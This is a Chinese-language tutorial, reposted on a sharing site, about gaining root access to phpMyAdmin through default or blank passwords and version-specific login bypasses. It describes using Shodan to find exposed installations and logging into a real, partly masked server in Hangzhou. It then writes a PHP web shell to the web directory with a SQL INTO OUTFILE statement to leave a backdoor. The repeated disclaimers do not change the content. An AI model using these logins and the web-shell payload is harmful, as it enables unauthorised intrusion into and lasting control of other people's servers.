默認phpMyAdmi:用戶名oo密碼oo或空登陸。版本2.11.3~2.11.4:用戶名'localho'@'@&quo;登陸,無需密碼。版本2.11.9.2:用戶名oo登陸,無需密碼。經測試,第二個漏洞在phpMyAdmi3.5.1版本也......
以下是【金聰采編】分享的內容全文:
以下是【金聰采編】分享的內容全文:
- 默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
- 版本 2.11.3~2.11.4:用戶名
'localhost'@'@"登陸,無需密碼。 - 版本 2.11.9.2:用戶名
root登陸,無需密碼。
經測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin

先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內的(浙江省?杭州市)。

地址已手動打碼。
http://121.***.*.219:80/

登陸成功(root 權限)。

接下來你可以寫一個 outfile 到對方主機的網絡目錄下。俗稱 “留后門”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
點擊運行,不出意外便在對方主機留下了一個名為 runme.php 的后門文件。
總結
以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對金聰精品的支持。如果你想了解更多相關內容請查看下面相關鏈接
金聰線報提示:[ phpMyAdmin通過密碼漏洞留后門文件 ] 僅為會員分享,分享目的如下:
1.軟件源碼推廣展示:目的展示軟件相關功能,接收技術學習者測試、測評;
2.教程課程信息展示:展示課程信息,傳授課程各階段內容;
3.設計素材圖片展示:展示素材設計理念、思維方式、傳播設計理念;
4.福利優惠信息展示:分享各類最新的福利信息,各種優惠信息展示;
以上分享目的僅供學習、參考使用,請勿用于其他用途,如果想商業使用或者代理,請自行聯系版權方獲取授權。任何未獲取授權的商業使用與本站無關,請自行承擔相應責任。
本站不存儲任何資源文件,敬請周知!
本網站采用 BY-NC-SA 協議進行授權 轉載請注明原文鏈接:phpMyAdmin通過密碼漏洞留后門文件
1.軟件源碼推廣展示:目的展示軟件相關功能,接收技術學習者測試、測評;
2.教程課程信息展示:展示課程信息,傳授課程各階段內容;
3.設計素材圖片展示:展示素材設計理念、思維方式、傳播設計理念;
4.福利優惠信息展示:分享各類最新的福利信息,各種優惠信息展示;
以上分享目的僅供學習、參考使用,請勿用于其他用途,如果想商業使用或者代理,請自行聯系版權方獲取授權。任何未獲取授權的商業使用與本站無關,請自行承擔相應責任。
本站不存儲任何資源文件,敬請周知!
此資源僅供個人學習、研究使用,禁止非法轉播或商業用途,請在獲取后24小時內刪除,如果你覺得滿意,請尋求購買正版或獲取授權!
如果您認為本頁信息內容侵犯了您的相關權益(包含但不限于:著作權、首發權、隱私權等權利),或者您認為自己是此信息的權利人但是此信息不是自己發布的,可以直接版權舉報投訴,我們會根據網站注冊協議、資源分享協議等協議處理,以保護您的合法權益。
免責申明:本站僅提供學習的平臺,所有資料均來自于網絡分享線索,版權歸原創者所有!本站不提供任何保證,并不承擔任何法律責任,如果對您的版權或者利益造成損害,請提供相應的資質證明,我們將于3個工作日內予以處理。版權申訴相關說明如果您認為本頁信息內容侵犯了您的相關權益(包含但不限于:著作權、首發權、隱私權等權利),或者您認為自己是此信息的權利人但是此信息不是自己發布的,可以直接版權舉報投訴,我們會根據網站注冊協議、資源分享協議等協議處理,以保護您的合法權益。
本網站采用 BY-NC-SA 協議進行授權 轉載請注明原文鏈接:phpMyAdmin通過密碼漏洞留后門文件

侵權舉報/版權申訴



